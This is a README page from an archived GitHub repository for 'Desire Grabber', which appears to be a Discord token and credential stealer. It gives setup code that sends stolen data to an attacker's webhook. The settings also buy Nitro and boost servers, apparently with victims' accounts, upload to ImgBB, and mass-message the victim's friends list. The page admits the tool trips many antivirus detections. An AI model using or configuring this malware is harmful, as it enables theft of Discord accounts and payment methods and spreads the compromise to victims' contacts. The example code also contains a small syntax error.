Skip to content
This repository has been archived by the owner on Nov 19, 2022. It is now read-only.

Latest commit

 

History

History
45 lines (42 loc) · 1.08 KB

README.md

File metadata and controls

45 lines (42 loc) · 1.08 KB

Desire Grabber

  • Multiple features, but the downside is the amount of detections it gets.

Normal Usage

Add this to the bottom of the code:

if __name__ == "__main__":
    desire = Desire(
        webhook="https://your-webhook.com/",
        ping="@everyone / <@user_id>",
        nitro={
            "identifier": "boost"
            "duration": "month"
        },
        boost={
            "invite": "discord-developers",
            "guild_id": 0000000000000000
        },
        imgbb="ImgBB API Key",
        direct_message="Mass DM Friends List Message."
    )
    desire.start()

Module Usage

from main import Desire

if __name__ == "__main__":
    desire = Desire(
        webhook="https://your-webhook.com/",
        ping="@everyone / <@user_id>",
        nitro={
            "identifier": "boost"
            "duration": "month"
        },
        boost={
            "invite": "discord-developers",
            "guild_id": 0000000000000000
        },
        imgbb="ImgBB API Key",
        direct_message="Mass DM Friends List Message."
    )
    desire.start()